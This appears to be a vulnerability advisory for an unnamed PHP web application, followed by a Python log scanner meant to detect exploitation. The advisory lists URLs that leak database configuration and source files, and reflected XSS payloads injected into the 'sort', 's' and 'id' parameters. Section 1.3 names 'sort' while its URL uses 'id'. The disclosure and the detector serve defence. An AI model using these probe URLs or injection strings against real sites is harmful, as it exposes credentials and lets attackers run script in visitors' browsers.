1. Exploits/POCs:

1.1. Information Leakage. Database information disclosure in "/config/mysqlconnection.inc" and/or "/config/mysqlconnection%20-%20Copy.inc" or "/admin/setup.php".
-------------
http://[URL]/config/mysqlconnection.inc
http://[URL]/config/mysqlconnection%20-%20Copy.inc
http://[URL]/admin/setup.php
-------------

1.2. Reflected XSS attack in "index.php" in "sort" and "s" parameters.
-------------
http://[URL]/index.php?sort=<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script>
http://[URL]/index.php?s=<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script>
-------------

1.3. Reflected XSS attack in "post.php" in "sort" parameter.
-------------
http://[URL]/post.php?id="<script>alert( String(/BugReport.ir XSS/).substr(1,16) );</script><br
-------------

1.4. Information Leakage. Source code disclosure in "/config/settings.inc".
-------------
http://[URL]/config/settings.inc
-------------
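
A defender-side check for the requests listed above, as an added example that is not part of the original advisory: it scans web access logs for fetches of the exposed files and for markup in the affected parameters. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Paths and parameters named in the advisory above.
LEAK_PATH = re.compile(r"/(?:config/[^/]+\.inc|admin/setup\.php)$", re.I)
# post.php: the advisory text names "sort", its sample URL uses "id"; watch both.
XSS_PARAMS = {"/index.php": {"sort", "s"}, "/post.php": {"sort", "id"}}
MARKUP = re.compile(r"[<>]")
# Assumption: Apache/nginx combined log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /config/mysqlconnection.inc HTTP/1.1" 200 412',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /config/mysqlconnection%20-%20Copy.inc HTTP/1.1" 404 196',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?sort=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /index.php?sort=date&s=hello HTTP/1.1" 200 5100',
    '198.51.100.7 - - [01/Jan/2024:10:01:03 +0000] '
    '"GET /post.php?id=12 HTTP/1.1" 200 3000',
]

def classify(line):
    """Return a list of finding strings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)
    findings = []
    if LEAK_PATH.search(path):
        # Status 200 means the file body was actually served to the client.
        findings.append(f"leak-path:{path}:{status}")
    for script, params in XSS_PARAMS.items():
        if path.lower().endswith(script):
            for name, value in parse_qsl(parts.query, keep_blank_values=True):
                if name in params and MARKUP.search(value):
                    findings.append(f"xss-param:{script}:{name}")
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in classify(line)]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

A `leak-path` finding with status 200 is the one to act on first: the server returned the `.inc` file as text, so the credentials in it should be treated as disclosed.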